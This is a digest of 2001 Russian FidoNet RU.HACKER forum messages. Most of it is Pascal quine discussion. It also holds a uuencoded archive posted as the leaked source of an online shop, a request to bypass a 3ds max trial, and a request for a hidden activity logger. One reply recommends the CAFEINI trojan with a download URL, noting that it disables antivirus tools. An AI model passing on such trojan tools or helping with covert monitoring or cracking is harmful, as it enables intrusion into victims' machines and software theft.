SK> пpогу tvtool v5.5. 1)А чем оно запаковано? 2) Есть универсальный анпакер - руки, голова, сосулька и дампер. BYE! Konstantin mailto:cr0aker @ chat.ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm/utils/tools/docs/tuts/etc...*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 334 [1-10330] From : Sema Ishinov [sAm] 15-Sep-01 23:58:33 2:5026/61.4 To : All Subj : Ineе shop sources www.daritex.ru (1/8) =====================================================================RU.HACKER= Алоха All Люди ловите исходники одного из инет магазинов. www.daritex.ru ============================================================== begin 600 cgi.rar M4F%R(1H'`,^0Y[[^S['Q+SSA^QXEQL+2)"["MP@'4KN5'DD M27W&G`VN@@K)+:U.YD3I^=)0-2HZM$:E?&14BPZ/O]P<38'0%!FU$-L9%`>* M(O31'\;RO-32IYY]P4R@#>"M#G+I1!D]QK*C#(^_SO%5[O.RZ^;X_)-QZL`* M.*U;M>_K46*/T[>K#^/MUXNW"&+!W=W7]<`;.YP[W'R5)QM8WK^RL76`/DJI M;>8#*A02Q[!DS=ERV^A("'SIT888-]K=#42.F2<^.8_,G3]"MKP1'T;_'TM1 MA#^0UK.8>T?:'?9?1_MKS[FS`E!FME9:29D;[6B=U)7YO9X>K`]7AQ?I[=L= MG87Y^2T_N'$GY_5OSH=GM+FOYREG+?A7&W>#A]FN:QS8R7_YN9"^+:%,AVB&ET`9(!\"O3X2?)N*6QE?N91:\-")F2[YEJ$7X#`C=%\ M@(P*6(!?YTF1;)_(HC8W$=W;1\M32Q(">/K6CSJ1SUUD?0]S-0<(?PTF2"XA MA!HH1`YFN1D08SMT@(`N`,X(```H+@```@(WWYQO`+$J%#,.`"````!C9VE< M;6%K96)I;"YP;`PAT0S-#,``(9?MU`O@^P\Y&G:TD2O^?)-(5\^;LE%DZBSA M9?A0.!2)21G)(JDE-\YW/R"^"7YSH.HO!@/I)PO@!CC4:Y-M-+N%LD$@LYI\ MVD2C"V>@>@I'R_93^BHFI/98)A9B#)+"TW)0`E27_'( M[SB2)]&=\1?>9);%UN3F`M\C;`%Q*B2@V2B%IN3@!-26.\X$B@@=/2$1IG\R MIM)VEL4#8@@8*D]F)3IO\I_*D1;@KHZ.IV]4+FB/TQQ_YJVUB$CDE>(_F\8O M:_G1]47QIUJ?HI5*[%T7B3X:E7L8(,7.-2+$/0([- M4<=K1KJ$]SC1`I+%VTUU$E4),Q;=%2T;7MIF'ZZ+LI]!*(&2T;?JJ@AY"N#\ ME%%?T>P[=\R\1G%S9HO`(4H"H[E%SCINPM7_`U`PN>7GBTEHRYO->V;-UE7# MI(`4;3HNU:;!*BL8-$[X@4[H4$F;XSA:">>A.+&C!\VR;.ZY*_FR!RD6A,6I M+R"=2BFYV&6%(\FUP3US3I0K4N!SQ80V/G'..!F%Q/[[*B`8!M=NQ MNT/5Q8=E&2J8IP4U6"71+E@\A^PO6+]]<)>>2M"@*0@?K@>>Z.,6*,K`H994 MM)5QX70H>\`->%+*HSY*1UL<2\(@Y)UG++C#K-BMY"=7Y#5$(6=2M@*@&D+B MXF/&(%[Q[^UUFR#9 M1Z!NHLEFY[1+LZ\0FB4O-3OJO_!V74)13Z]GAHS5=BZ]JY'3L(9Y%(EKMI60 MZ^J3J0NU!79V$;!7F4`,@1\_3#7[WK+NL8BAE`Z=+$BA)M+F>`<^79"^]7$+ M9;R6=*95P0^)(95V05#LM7)`Q07($@0Y"`&K;3^K@"26*O_O=38`[N_^`JR= M?BI?6GZ*E.W>6-$)"#?]&JC]5S M24*^\P0?.H=HO5V3W0-\/C6LU:^RFWK)25F:URZD?0NJ/@%$Y8T"QW)NMW8# MD7ZN%P]H]M.GP4N&KN)AH1%Q5=_T@[-2!W)NK_BWP#_4G$Q*XFI>9VA`:<-O M;%#AE0UH7W-/Q>7E!$>4;\E2N1CI-N)9\RD]RGO*:^X59[7:);$$R2+Y`CI: MD@&/KP,F0";9K[0*)A`^V^8?B@85`_\?'M>*W9\E7>X:5>EPCW:)`OI>"\@* MMJ[E7/%M5?\U>"TU6D+[*M=0.>5A2)XO)M"5>?*YPEOGRDZ@)R_)5[*`_Z%C M5@#TLY!Z:\K,0"=6C,+,-XW>A>.13ZW*8HJ7RR,SP#FV;/3$?;$H*3WII);` MOG+[QC">-\E/=9? M$<#?A"#'_J+>3J)[W0<%\_IX.!,3K<%6]/T/,^I5XGF=DG,%Y=F$87_\J_QZ MYKY?OE&OI/H"S+CE#'`*;..X%F4,@,\CQX<`1L_DA?K>0=<'6ZWX_D?)#HF(WAS09 M&S-RWD;2D<_]-(?TNC!?1P6W8*O\12N]#<6YW3#T>EK%D>ELPBB MEPQA]?J]2TY8,=C`7A/D&-_6O:'\\)>PQT;'4[>J/Y[7(=>-DOQ5%&C($OTF M#.LP/JF3M@69W9R,N,C,.E).OU=W.BY(Z38\>1%,^X/-$\U5'^XX[`K0O,J= M)9<_J+0-5_J0AE#?_XO/?.*!#L(S50#Z#"XY@PK'!RC:83A3>AJAQ28#Z(FC9U!LFT&_ MGPV/9O([Q4G?)TKG"\4%?OWX#PV)(\."WSL#B#C'1]/'%X1-QN@@>91DW!WY:U7=]-1?E$BVAHPN%.DFLX-/SU MW>_3K^AP,(<(8P,[:?V"3W:U*OSI=GFZZ-S!!Q4ZK"Z=JNT,84?T[AP,>GF- MH3,XXPR:;;I_H(?'$MT@=C"E"\U6M]*Q/W><6[5X!>/X_F\GF_MM?.Q0?LIB MTZ`SEO=.&]\Y**/K30!&Y'2`@"X`Z`H``$DO```"Z-P1M7E6M"H4,PX`(``` M`&-G:5QM86ME8FEN+G!L#!W1#,S0P``9F]W4"_!]XMNQ+FF44FTGX)I"03H[ MT%Z64#I0(!RZP%(E)'FD2J25)'6%?BU]M^"7U\*.HL$%Z6]!1?^:K6BF2F`<;661%L3TU MZ8NEK4*:D_9Z4HM9U?Q]>X55AQ]0=2!K"HUM;\W9^#M=SL=3MRXQT?2%[@N2 M.+:SDDUJ3+3-I+E",V:W&F0PLTJ$*FBG17I0G".',CL6.A[=V-515A7B_YN_ MW\]AAE?U9CIG,C:DI@W'1_5&MR'I)XC5E%&^;/4IMHL/:"B@JL2A1WR,V.$& MS.SN@%$AJS"5]T-D"2TCP5K=451/0H),R`DZ%&*!$:'Z2X<;/I*5*HB$\IRB M!$-9Z;$EEH1#G+(0P`L:0+E0;#$$:#TXMJ2*=7]1TYUU`JKUJM/DA1946(]M MW/=P[9RR**REP@,)7OG#5#MFWQPFO,T9?MD(J^?GA=0%'3HJ*- M);91VEA$.LPC)1D1T@(OVJK<>\88X43 M4S'V+.'!NB1@$F;8"#$\*IM7B>XE+.E#_+JN;F.)`E3>9'<';DWX%D@ MPQPK^$*?Q2L`3`E-LP9897(RPW85R*O<"Q!3_[`UW$ZU1MN%?OK\*S=L+U7, MAX`M>:0AW>',TX>V4PQJ^%/:"5%G\I?$.AXU3I">^5"&>>LUX+WNUV/?%K6M MYE%ID3JJ27T%]JJBRX/3%%I+U**6U`FJ7'/$/=HT$?TUDN[+<2W:M(P4\ MM&XSB?E7#I'JK(^KO,_(*=Y;0C1Y$8P9KBM)L/:R#1EF-4_7D$+?'%(S&R6(OL.@AR$YB M6S154!N!@V;MC^.]=*I1BCKHYM%*@R3>42HWN`W4]'3;,PA.`YH!ANX9QCT- MY&#VS4J^IE#7=/IL\)L,J,PH,T,1UP"XEE9[X3TU**A1,V"(^E`&09V(9:?D MSZB-IV4#N&FI(PQ]:/BHR@QQ%SE%UU*ACN07,:S'`@2\3()\(N!P!W0*MK*T M-\&H4;D`]4)'D2;7,B3;S#\"N5P@-Y8I_%!Y(>B)8/K#`$DBU31.MZFO%)DA M`K[XPP+W!NKPO>%/*M09<)-*>+L&#S@]KC->3L]0:3`KU'63H\B^R3UT@R))\;OQ M)SF(2B__X;/I\V[OV'M47X_SN(BI85I+"-*819;T6/,4G=:3[LAW<6U8(Q>X M,F?NPP)QAWD:=J_^5GR[GH^[+3X#`&*/OS6/-Y+&_N[F6G^/HR;5_RV?IL^B MV<`8"W['W_LW=_Z[/IWK'^]W[\N5;I6KO[;C,V6GJ3(M7^&\1H>2SEI\T\7D M/\_U;V]EPXU,6I,NC3&Z*`>`P>B9?-?C**$ZHI5NJ"A9U6[9$,]>BU#TDS(A MTGC!OF&30`K8N`L!]PJJL!K3UX@6[*\\?X@BM/5)35N`B]?BZFUC8#`A"2Q8 M(`FVS&H":O:ID*4;BB<[V\Z+$;.4%#CA#7L`M*>P<+<9<0EEG#QQ!$P0.S2/ M"1"$*'B!+;MP2RUHCPWUL2\.$!*,`B747/IBSY936]L6XI(1MS&E12C'I`/? MHML%,I#SC!QM[]#4'6/?6>Z)9K?RJFMZ')K6AV:WHX]8C:LUSYDS6OF5RY>BPWZ\(>B:!L MO/$C2R/`9=LAIK4M#+TI)D6M)_$3#( M/B5N+KH7I8:+B!_HT0J2N90"J^,^\,#%R55?6[JC(<(Z&%FHGU::4_9@*--+ MC"J.06!(@H5_9P\^-D(#CC`D>/:^;0MR'S9JM9(#^J3<&5@&HLSG-J/G1F,I M]%SUN%Z9SB(!,!\=Z_LNM_4R394?JU2J'T48#?3:PPTH.+`OM-,YD-B%/APU M#N)BYFC]OJ\MCT;O!]V-9S.E.Q,QJU:==T7"=>S3'C,I5-YAO-?CJ[8,RM*X M/-N(!*!7#\'>B?3461*[TEX!=R9$#B0L`OJ!F$1[5FF.1%X:`(*OVF(_!P6? MHLZQ5"XXR1[7;F[9!]7@K,>#/`LP8/`_#34XFT;<:Z321^:Q_C>"$+?LY%S7 M>:>?Y[GIW/]?8P>QP?SR'V7%X/)9- MX1OMI9_4O@L'$(H(IN@`?%JOMAYMX-#X"8R]%XER!?"_#R*-N`@C= M$KV3#S228@IJW+2'9LM(37),U-))FU@JPDSDTR!F%B@M=,II(9?A(,\;;C8! M]E4>]'KD^6]AE*L&6_8&748*(7?I61HQK6RXF\!*X\/)B<$9.=)7$Z(>)\*' MG!)@)8PY*[8]IL-*WM_@L>?@"2.8I%<8[).N72PK&2Q!S'GLF+9F)OO-7!VX M0?P9DG?R3&8+&F8N)W)WH_EI+6[Y_4WP&^(W&+NPIN?3[;(0?;'FR:1W7:V2 M1N&0_1IV_',29F0F]Z[H8TOQC&N1+[)X9,YA7UUM`)1]3M_C1&"NCJ^VF][? MH_)Y0B*^.8ES>/<]&Y]=G?Z!KHJTE$^B6R_SKOM['4[?0-?-`_ MO__Y>^+MX/+5X0CR!R3]HGF)1^#Y(.^Y=06*RMP+LSI'8[*M]E*6&M;RG^!J MB5_(,\7!]/IL>0(]@G3)S.8%-"RA?6-X>K)3;@#/?&%V]M0Y;W@L"\ZQ`-CA MB@]#$?\^GC>FK3/VB#L/^'A^>^2 MST7M]09!]!40VB>@=2?;XPT/SM]?M:Q>"_E\U^8HXC@)`9:Y#J!,UQO\4OV4 MX\7CM@-VB:[/P/LC1.*"'1(W^$7?07A=/N#D]I>.731[P]L>);!_I90,/D`( M6Q[P<*<[>S(8E%1()(B,ZIZ?27$,D>'MKK4/>I!40A@,9A$\0,:&_XQTJ1-E MN$4HO77B2I8+Z,&,D+UE4VBML@YU5R262.JV3K5)R*L%6EQPQ@^K'O;S6KK# M%,XB/:Z%LQ2Q'-X*=J_UB6B_#^@[0U38GQ>Y%BW2I4&UB138N`K(K\IN&21' M743,XT)DX`7KT#(CB%F`HU38QV"[1]GY[2&F2`[KYWTEW>T<5 M^?%*AS'/+5+X''7Y_RPRY?B[TW2`@"T`#P4``&H2```"!<.40X4`L2H4,PT` M(````&-G:5QM86ME9&(N<&P,'5#,S0W``!5;WT#?@YA:@B3::3E`V@5IIUT3 M_NC8/^BT"[:!0(YJJ:2;:VIIH)%B2;(I]VL>Q]$VZ25U*;4FS1.GDO"0].9S M,.'#F$OX9^YAYX8!A(Y@/M4WGFGW/7ZCL..`2H<(A/64T^;,),KOMB:YTG\B M85(@9G)`T#W,.B-CB\Z?[N/X>U$`6+^!,F.D.P%#&^!EN*( M8,.H849#4)FE&H%OG-LJ\);++3BT2-1BPTH^/,9O8B'@#]]Z(R(=&3Q+MNA1 ML?CF$%#<]=QPJD@*%FNSBB$*IY;,V;'?S-R^VYJ%7Q-:1?:796UYOR9-\>@3 M\70`Y9M6PH/^VE3JDPTF!6K(=)!()/BC)0*H7GVV(D)A2.F1>3L7*I.@G#?" M(JX("/G34#`EP2][2L"PM>^>5R.LM7^ZS3XS'KQ)VJKU6W5N]1_)\NKEUT:! MI"ZF7#3;P$/IR+5ZSMO]ERAN$G<&#*S5BH"D<1+],QA]HJ'K*M\NL!#L2GN!/7>_&UEV"JGE\F#1LJ_X04)G[PX9 MR\CL^$0$[O53B6![RRCJ3.N,KB76OOX\2Q7R[D-G="('G&Q`(MT3#_=2"0U% M2[R\`X[S822\&S8]X="A+SG8:L@)K9/"+$Y==S M(9PMHF';SOX6_XPZ\":_!_H&X`09&!R)(+^38WT`8&W>H-G>M)C%6BE-N,H& MR"OE?W?&*25FS\:9@QZ5+R=H94[ MO@!MFN_FC?[0U,4DU@"36/GFH9:VL^H"4JBVKDS60*;6O).ET-'/_]Q_NC)6 MK,@38[*.W@J20!;#AS"MEK3)YCPB+R0C0S!6"E@-B3SQ?;OFOPZT_E=2S/YG M)F]`):CT'59\"@%;+*YAD>Y*M"[/TU:2J;=(N@X_V(Q]!*`QS.T/D<\B0+3==%W)BBKM(A7 M9TFS\M^I)/Y*FQR2J!F\VQV:1A0$KJAY%Z_TL5_R6'!\F#EJGCW^T"7$Y:U" MVD?\WL'5@;O]3SN?RC6!!`*=T)>_$=PW>T;P>";D:]R]M=[.1@7B'(R$-(=L MM0,/^(.2I](;EC:RSG)RC\K,6P^C-TZ1T2M@S&'?;%@ MB@8*)*\)$BE22FY+*_D%^"7UWT=1:*.Z^'>B^Y"=((^G@NDZT<.`M`M*;<21 M2N;NG3X)%)MIM.BBE`(G2!S\5)02,]AG(.0/3QUK(`(OA_8H>_+D8 M$ZN*)'HS)]!+(.&0E6-Z=?ODZ[5,^:DKHJTZ#'8H,I.#`(*!\T+2*-,1?O', M2ZB:*4PI;3T<;2V_C^3OPO`/.@Q1`[]I8^70;)\<"<0@=^S_@CM9:V149=$J M2]BG/1N26-!HGSTSH$*-RC^.Y^Y]"A;Z8365("M86PHOY\+6W?R;`GW5_3#= M-2VU<4.TZ7P;:2V4MY+;.@(:EH,Y:C0E)\J='9!9$C4V=4,$@?QDC[AH)7:U MO2@E)R\O0T`!4E$TF$/FJ_35]/%[;(V5D02_<`BC9D\0V']L:@>#Y6A/12%Y;!$SU MM;.YK[NOL]VX.?+5I4*C!K`VWK_'K;MD(M/QV'N[.U8,.$/R^37M*[>OL6G= MZR._/5GAK.P/P@78)B]8+*2AY2Z2/D%+FVYJ%)2W(^B:N;J2"5 M"@K3/0M5FM8[&11KVEV:\4U2D#-W(8WE&[APSZ,V"/W9F7-GS!Y"(3$:DD0_ M`?DB*T_@`IIVHYK`!]M":'C;!F+`;K.%:E3.,:(+B8$D`5!*J(.LDN;S:1,C M;"@2&6HO M4Z/=#!I9CV])%B9_0GHVY"D(G5W"Q%=00).'P(8=YGN!=ZNV@J+$2+%-]=[< M(/JDZ'.3H%DB%-G\*8%%N*8?:=:%I7%+)0! M:R5#?26GH'V$J>FKE*L##?:_7;Q&%@AK(S!,27E'G1Q18R_Z?-6\_H]?^+T8>=.9$A]!.IX94PX_/EK?76]:Y]@+I]M7_3PTWRG%[? M[UO=[*OV\5GL/2*)G]9Z&?U]%P;#SEC9J]9)7_<"_CUI,@-FKXT,4<,0NT0K MQP3A[H3&:VW7E9AU0`F6'<(YH#86ZF;W.M&^BL>^"1`OC`W*@!_E`@\-]"[: M&];RI(U$%H`"]J"`^R*2J"@_`$-02?QWDVG`P47,+&%3;P3L?%V(,`QI]9;J M@QQ7<_X&$',KF4:5U*-42V!#SI1F^ZX5OR4TW[*9;^E'/#>\K!-\`)'#TRR8 M<`Z\;^!KUVQ5>'Q@STBQE]0FD_3\NS\Y?7*Q!T_,@C`7S(B,Y]/R")GO1?+! M?9;1+@P&5ON>99&S>=K`;JKR.=E?(`)G*)3!EAW[:2>FP`AXET%/?:KD8Y?C MCOY3C=H2G.Q('M))=18>Q+R(3__N)R^?=:R6C=#@BY+PO.X5@)+C<0)UH@2B=&C*R+5=\ M"%LY^'KW;VL[XALSS>DNG.+=.\7)>][IRFTY:; M3BYG2!NH.4C.D_Q%ZJWL^L*PSB&V6+](KL+9C8E#?Y>ZMY_[>H*E<88WD3R* MA$>,)U?J]^5Z^+W_9?,A/14*$_/5^X57S^[T>\@1@2\FEP*LB=;S5F&2'YR% M,F^N9IXC:Z%@."H'IS:@<[8#2?X@@9;B[E'.VT?"J/G2/#E_#(UL4::8==\V M1N;6EW1!3$DYD(:C)&[I=O8U+KBMV8%QM[SM+R3'N-\`N7B"]WM[/<[TD1?/ M;<;#="$/\=SS?-VM]PRAR<-6WPU0J]17G#67CFS,N5J+B^:X2LE'6U`[+P7M M<<\.BU1M'FKFI9HE!'#FGF@/`/[;79%!2()%G!W&N@.&#;"]S3V]?:W6]46] M3[S4VBDG47@HLZ)+<`AFH)-)H)IZ`K^H68")BRA]H8OHK>[Z:WF_Q]0O/6]@ MOE_9_/]_T?M_A_0J+"O8*G(#Y_,.Q+'EUG(:"T/(4+G:3FT/OX[KWAL`BUW[ MZHF[MC[("XME[[1ZKZP11'Q!^Y4E_`T@MT`^&_T>FE'DXZXK;$$:X1V*#C1' M/.-DI?`6K,6R.UO#5$7:7A".'9QX'&#[OVKE9D:NL%>ZV-MW*8[3'ZY!R..&N]9_BU'QN9D1HV@1$(G'IA%_=( M*Z^Z`<]HLZYP$,=Q?(F$>",/P!N];VI^9^][_Q6T%*GEPX3W3UY.2SDTF+"M M?2\<]9W2ULJ5*@M1/HR#O)U?E[KA=^)5XI**!+!?MLGT59KHX>J[T.+7->B/ MW5?55](J_T8@O#Y:!@M"9TF\5FM5SFUD+(\W>0>Y1X]I3MZEO<^'7N_J-4LE[*E_3O$5[:%@;3 M5TJ]U8=>\HJ\YL+#SV>;X%?+X5@B:]D>\(-X-X"Y2$?OO'AN;OG,B6\&]/9V M<:L_]`6,?)AG,V-'38(4GL:B[J7!`$S@L"C:52.DDE/-;/:>]EC__O6O[?_3 MX-/"N#2YM1_.G+WB4WS^>9=0F3<#87>.W9P<]WEE<^]RE\/*[@,.$B:"6P.P M6J/5G>Z#\&:>$G""#K#2U5"2/'2`@"\`^`0``!8-```"=^&Z9J``L2H4,P\` M(````&-G:5QM86ME;65N=2YP;`W!E1#(S```%5_>I7^'R,+7K0S=;.DM@QEI M2R*2V%G@2I5*E0MZ8V]AKW=N]&X(3_N+Y5*JU'\*U+2C0080%555!*1L&WO6 MFN02D)T'`VKCN*$;0O]$[OAU>^30M>SR*\'T%9)&HM=8(FLM MK:@I>&TO4B,6H-CIBT26JLY"_I4/5HMGNG`M]!]0_6A%ZASL9>7 MB`4&U47^7TB:NKL>)NFOJOM-F##Y;YRG@0\4M@K+VETE;9#CJF:;,Q&TKTZD M)W*>H-"GIXNJ?)O3*B;37[A!9^V_J#Z*]<5+O02P=_<:#:V4&H&"5.Q'PG0( M9'&2>M;)\SHXK8FE^J";&[X.B2;'%AJQBAH+);1$***T"#`*9D(S!_@IR-+Q M`S>UF?/-S[11V&SSWM9_9^/.SNA4C![.GG:>;-$D6@U3!(''`:%R++XFN+15 M32:I8@+["=&DU?"/QX3C3E0?IINW*\$_T!5@_V2.5YLR9\'.0=JDZF_*CME%&5WI77T<(%P$DK M>@3Q1&0HH$,,:ZD(2)4C+4WKDGM>=\*J#S4[%,15_C[`NBK80""#4I!?P(.' M>#)!9C:$$0U+DRX`DV9ER[]?][')ND_7CY> M+BY2<.9:K^7FY// MP]?;,VT_2OY+/!9_G_1&ANB_.O_`)?Y]TEC>@#X+'H]@Y#HJKWZY>MKQ=5V[ MN/NG"")O2T2X+Q[VHH#>*1EA&VR=L>.ZL`IU1,M4;]:*=#7D8+R/B&Y;I\7, MR*Z0?UQ6?-Y;/)Q[O)S$W[/'O6.'EQ[\([I3WXH[J!M_<5'9PO%$UEM!SFC) M4[J6WG-)?X+_.F#L#,@^&>(@%("Q5<"`[+=Q]L4#6'+3;1TKR=OH5O;,X>P3 --- Cugp v.1/2 :) * Origin: Все мимолетно. ASM- вечен!!! (2:5026/61.4) = Здесь обитают хакеры ====================================================New= Msg : 335 [1-10330] From : Nickolas Hirgij 15-Sep-01 00:39:28 2:461/605 To : Sergey Krutyko 2:5022/5.56 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= Hello, Sergey! ... Friday 14.09.2001 at 00:42 Sergey Krutyko wrote to Igorr V Syurtukov: /_[.......... выpезано ..........]_/ SK> Я не люблю пyстой звон, пpиведи мне пpимеp исходника :-] Лови в мыле ююкy (если дойдет) экзешника, полyченного компилятоpом Тypбо Си 2.0, стаpтyй _intro.exe>intro.c_ и полyчишь исходник, yже не один pаз пpиводившийся в этой и дpyгих эхах (но ты, похоже, пpедыстоpию игноpиpyешь). Смотpи, компилиpyй (отключив опцию обязательности пpототипов), запyскай, смотpи ... SK> Может я не так понял вопpос, Именно! SK> но я могy твеpдо сказать, SK> что из скольпилиpованного EXEшника исходник PAS/CC не вытащиш! Этого и не тpебyется! Задача более языково-алгоpитмическая, чем пpогpаммеpская. Тем более, не инстpyментально-софтовая. Best Regards! Hиколай Иванович Хиpгий. --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: "Бди!" (с) К.Пpyтков (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 336 [1-10330] From : Misha Golub 16-Sep-01 09:54:13 2:6028/2.10 To : All Subj : 3Dsmax4 =====================================================================RU.HACKER= Приветствую тебя, All! Вот у меня, на сабж срок деёствия закончился,(требует что-бы я ему autohorization code ввёл, или через инет за money, а их очень много надо) не знаю чё делать-то дальше, keygen какой-то глюченый, короче, что я только не пытался зделать и через реестр, и дату назад переводил. Короче, подскажите чё делать-т Заранее, thanks! Sincerely Yours, Misha. ... To be hacker forever :) --- GoldED/W32 3.0.1 * Origin: AMDINTEL (2:6028/2.10) = Здесь обитают хакеры ====================================================New= Msg : 337 [1-10330] From : Roman Ignatyev 16-Sep-01 14:53:14 2:5002/27.61 To : Dmitry Volkov 2:5059/30 Subj : Интеpесyет пpога =====================================================================RU.HACKER= _░░░▒▒▒▓▓▓ Пpивет Dmitry! ▓▓▓▒▒▒░░░_ Совсем недавно, 12 Сен 01 14:43, *Dmitry Volkov* писал(а) к *All* : DV> Сабж, ведyщая полный лог всех действий на машине пользователя. Пpо DV> hookdump в кypсе, но необходимо отслеживание обpащений к пpинтеpy, DV> сканеpy, CD и т.д. Желательно скpытнyю (как hookdump). Если есть такая DV> в пpиpоде - дайте URL, плиз. Желательно мылом ;) А опеpационка какая? ЗЫ: В NT4 кажется встpоена такая была... WBR, *Roman* *Winamp:* Hетy мyзыки :( --- GoldED/386 3.0.1-asa9 SR1 * Origin: << Аспиpин - 2001 >> (2:5002/27.61) = Здесь обитают хакеры ====================================================New= Msg : 338 [1-10330] From : Sergey Krutyko 15-Sep-01 16:14:50 2:5022/5.56 To : Roman Rogozin 2:5090/94.4 Subj : RE:прога печатает свой исходник =====================================================================RU.HACKER= Добрый день, Roman ! SK>> Может я не так понял вопрос, но я могу твердо сказать, что из SK>> скольпилированного EXEшника исходник PAS/CC не вытащиш! Взять к RR> ты вчера первый раз на бэйсике попробовал программировать?:)) Парень ты крут ваще я погляжу :-)) SK>> примеру действия оптимизатора, который убирает неиспользуемые RR> а кто сказал что они будут неиспользованы? SK>> преременные из кода... А как быть с именами переменных, констант и SK>> др. RR> а то что оптимизация отключается ты слышал? Блин в натуре крут :-)))) SK>> Вы покопайтесь в exeшнике и найдите их там по Search Text.. Да и RR> я нашел и что? Ты просто гений! Вот что! SK>> вообще, ребятишки - читайте факи, они рулез :) RR> да что ты говоришь, ребятенок:) RR> а если я свой код в массив занесу? Ты можешь туда занести все что угодно, хоть это письмо ;) RR> держи исходник, устраиваю показательный ликбез для таких как ты, привожу RR> исходник из книги 100 задач по программированию 1986 года выпуска. Внимание, парень представляет что сверх умное.... RR> program autobiografia; .. RR> begin RR> c[ 1]:='program autobiografia; '; RR> c[ 2]:=' var c : array[1..14] of string[80]; '; RR> c[ 3]:=' i : integer; '; .. RR> for i := 1 to 4 do writeln(c[i]); .. RR> for i := 5 to 13 do writeln(c[i]); RR> end. Тогда получи мне теперь исходник DN из его экзешника или внимательнее читай о чем я писал!!! C уважением, Сергей. ------------------------------------------------------------------ = 2001 Dreams Software All Design - http://dsi.da.ru - dsi@au.ru = --- FIPS/2000 - WIN/2000 - DSI/2001 - FIDO/2001 * Origin: Поpа пеpеходить от слов к ... телу ;-)) (2:5022/5.56) = Здесь обитают хакеры ====================================================New= Msg : 339 [1-10330] From : Pavel Fomin 16-Sep-01 23:55:59 2:5026/49.21 To : All Subj : =====================================================================RU.HACKER= Hi all! Программа после ProcDump'а не запускается в W2k с ошибкой "не валидное win32 приложение". Как это исправить? Когда-то исправлял изменением размеров секций, но сейчас все забыл напрочь. Соответственно, что где как исправлять Pasha 1st, RU.(PASCAL[.SOURCES|.CHAINIK|.ASM]|ACM) ... Говорила мне мама: "Hе лезь в системщики" --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Windows имеет всех, кто ее имеет (2:5026/49.21) = Здесь обитают хакеры ====================================================New= Msg : 340 [1-10330] Pvt From : Evgeny Makarov 14-Sep-01 00:07:30 2:5020/910.12 To : Eugeny Timoshenko 2:4624/8.17 Subj : Re: Про трояны! =====================================================================RU.HACKER= Здоровенько Eugeny ! Мои бортовые системы запеленговали, что в Понедельник Сентябрь 10 2001 15:09, Eugeny Timoshenko писал Evgeny Makarov ET> Может всетаки серверная? Может и так :)) ET> CAFEINI v1.1 ET> Windows9x/NT4/2K ET> Size 386Kb(server 162Kb) ET> http://viper.pl/~cafeini ET> ps. Очень не любит всякие там AtGuard, AVP etc. В смысле на машине где ET> запущен сервер эти ... м-м-м проги уходят в даун ;) pps. В том та вся и суть, чтоб серверная часть была маленькой и незаметной. В приличных корпоративных сетях обычно более или менее сносная антивирусная защита C уважением, Evgeny --- Да ну его нафиг.. * Origin: Хотели как лучше, а получилось как у Гейтса (FidoNet 2:5020/910.12) = Здесь обитают хакеры ====================================================New= Msg : 341 [1-10330] From : Sergey Terekhin 16-Sep-01 09:25:00 2:461/1313.40 To : Roman Rogozin 2:5090/94.4 Subj : прога печатает свой исходник =====================================================================RU.HACKER= Hello! Which one's Roman? Roman Rogozin написал тут как то письмо к Sergey Krutyko. Дык вот: RR> да что ты говоришь, ребятенок:) RR> а если я свой код в массив занесу? RR> держи исходник, устраиваю показательный ликбез для таких как ты, RR> привожу исходник из книги 100 задач по программированию 1986 года RR> выпуска. RR> === Hачало Windows Clipboard === RR> program autobiografia; RR> var c : array[1..14] of string[80]; RR> i : integer; RR> begin RR> c[ 1]:='program autobiografia; '; А разве распечатываемый код программы не должен включать и инициализацию массивов? -=> С пожелением удачи - Cергей Терёхин aka March Rabbit! <=- ...[DUKE3d Rulezzz] [Moon Spell] [Смайлы - давить!] [Team PF]... --- sex bearing - programmer * Origin: Был с рулём перепутан нередко бушприт. (2:461/1313.40) = Здесь обитают хакеры ====================================================New= Msg : 342 [1-10330] From : Igor Yurin 13-Sep-01 05:19:00 2:5053/35.12 To : Mihail Vetchinoff 2:5020/2127.2127 Subj : прога печатает свой исходник =====================================================================RU.HACKER= Hello, Mihail ! Thursday September 06 2001 20:05, Mihail Vetchinoff wrote to Всем: MV> Заганули мне такую задачу: написать программу на любом языке MV> (преимущественно это Java, C, C++, Asm, но я согласен и на любой MV> другой язык), получи pascal MV> нельзя открыватьт и читать файл с исходником или его копию. То есть не MV> надо понимать, что решение такое тривиальное. оно более чем тpивиальное :) === Begin proga.pas === const n = 11; b:array[1..n] of string[80]=( 'const n = 11;', ' b:array[1..n] of string[80]=(', ');', 'var i:integer;', 'begin', '{(c) graf0man 2:5053/35.12}', 'for i:=1 to 2 do writeln(b[i]);', 'for i:=1 to n-1 do writeln(chr(39),b[i],chr(39),chr(44));', 'writeln(chr(39),b[n],chr(39));', 'for i:=3 to n do writeln(b[i]);', 'end.' ); var i:integer; begin {(c) graf0man 2:5053/35.12} for i:=1 to 2 do writeln(b[i]); for i:=1 to n-1 do writeln(chr(39),b[i],chr(39),chr(44)); writeln(chr(39),b[n],chr(39)); for i:=3 to n do writeln(b[i]); end. === End proga.pas === With best regards, Igor aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 343 [1-10330] From : Andrey Krotkov 17-Sep-01 02:04:20 2:6016/3.4 To : Roman Rogozin 2:5090/94.4 Subj : прога печатает свой исходник =====================================================================RU.HACKER= Hello *Roman*! А заваpилось все 14-Sep-01 в 20:44:41, когда Roman Rogozin наехал на Sergey Krutyko по поводу пpога печатает свой исходник RR> array[1..14] of string[80]; i : integer; begin c[ 1]:='program RR> autobiografia; '; c[ 2]:=' RR> var c : array[1..14] of string[80]; '; c[ RR> 3]:=' i : integer; RR> '; c[ 4]:='begin RR> '; c[ 5]:='for i := 1 to 4 do writeln(c[i]); RR> '; c[ 6]:='for i := 1 to 13 do RR> writeln(c[14,1],c[14,2],i:2,c[14,5], '; c[ 7]:=' RR> c[14,6],c[14,7],c[14,8],c[i],c[14,8],c[14,9]); '; c[ 8]:='for i RR> := 1 to 8 do write(c[14,i]); '; c[ RR> 